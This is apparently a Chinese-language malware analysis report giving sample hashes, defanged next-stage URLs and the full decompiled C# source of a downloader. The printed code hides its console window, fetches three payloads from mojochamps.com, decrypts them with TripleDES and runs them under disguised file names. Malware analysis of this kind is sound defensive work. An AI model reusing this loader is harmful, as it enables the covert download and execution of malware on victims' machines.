样本来源
如下图
样本MD5:
1817cd95e422a9094d91c6d61c2ba8cc
d78e8943a1a2932d094957ef47956324
对应SHA256:
ac80eb10f16f3da1651b8fcb7dbc714255f4ec9719e922baeeb3499d9bd89e23
3fbbbb3ba6f63bf7d789cb845a33dcc457f0dcd73c45e53622dbd2c54fb5ca0e
下一轮样本下载地址:
http[:]//www.mojochamps.com/xim/m/p.php
http[:]//www.mojochamps.com/xim/m/sc.php
http[:]//www.mojochamps.com/xim/m/o.php
https[:]//tinyurl.com/pismal
https[:]//tinyurl.com/scoscsc
https[:]//tinyurl.com/oooooooo0
样本分析
在互联网只发现了其中的2个样本,均为C#语言编写,且代码流程比较简单。在ApplicationData、CommonApplicationData目录下载恶意内容,解密后运行,代码具体如下:
namespace Smixblix
{
internal class Tkmxk
{
[DllImport("user32.dll")]
private static extern int ShowWindow(int Handle, int showState);
[DllImport("kernel32.dll")]
public static extern int GetConsoleWindow();
private static void Main(string[] args)
{
int consoleWindow = Tkmxk.GetConsoleWindow();
Tkmxk.ShowWindow(consoleWindow, 0);
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData);
string text = "p";
string text2 = "x";
string text3 = "e";
string text4 = "n";
string text5 = "g";
string text6 = ".";
string text7 = "v";
string text8 = "b";
string text9 = "s";
string text10 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\taswala.txt";
string text11 = string.Concat(new string[]
{
Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
"\\scanned-img",
text6,
text,
text4,
text5
});
string text12 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\khat.txt";
string text13 = string.Concat(new string[]
{
Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
"\\p",
text6,
text7,
text8,
text9
});
string text14 = Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData) + "\\BBMN.txt";
string text15 = string.Concat(new string[]
{
Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData),
"\\siemence",
text6,
text3,
text2,
text3
});
bool flag = !File.Exists(text10);
if (flag)
{
WebClient webClient = new WebClient();
webClient.DownloadFile(new Uri("http://www.mojochamps.com/xim/m/p.php"), text10);
Thread.Sleep(1000);
string c = File.ReadAllText(text10);
string s = Tkmxk.springs(c);
byte[] bytes = Convert.FromBase64String(s);
Thread.Sleep(1000);
File.WriteAllBytes(text11, bytes);
Process.Start(text11);
Thread.Sleep(15000);
webClient.DownloadFile(new Uri("http://www.mojochamps.com/xim/m/sc.php"), text12);
Thread.Sleep(1000);
string c2 = File.ReadAllText(text12);
string s2 = Tkmxk.springs(c2);
byte[] bytes2 = Convert.FromBase64String(s2);
File.WriteAllBytes(text13, bytes2);
Thread.Sleep(15000);
Process.Start(text13);
webClient.DownloadFile(new Uri("http://www.mojochamps.com/xim/m/o.php"), text14);
Thread.Sleep(15000);
string c3 = File.ReadAllText(text14);
string s3 = Tkmxk.springs(c3);
byte[] bytes3 = Convert.FromBase64String(s3);
File.WriteAllBytes(text15, bytes3);
Thread.Sleep(26000);
Process.Start(text15);
}
else
{
Process.Start(text11);
}
}
public static string springs(string C)
{
byte[] array = Convert.FromBase64String(C);
MD5CryptoServiceProvider md5CryptoServiceProvider = new MD5CryptoServiceProvider();
byte[] key = md5CryptoServiceProvider.ComputeHash(Encoding.UTF8.GetBytes("new Stream()"));
md5CryptoServiceProvider.Clear();
TripleDESCryptoServiceProvider tripleDESCryptoServiceProvider = new TripleDESCryptoServiceProvider();
tripleDESCryptoServiceProvider.Key = key;
tripleDESCryptoServiceProvider.Mode = CipherMode.ECB;
tripleDESCryptoServiceProvider.Padding = PaddingMode.PKCS7;
ICryptoTransform cryptoTransform = tripleDESCryptoServiceProvider.CreateDecryptor();
byte[] bytes = cryptoTransform.TransformFinalBlock(array, 0, array.Length);
tripleDESCryptoServiceProvider.Clear();
return Encoding.UTF8.GetString(bytes);
}
private const string classes = "new Stream()";
}
}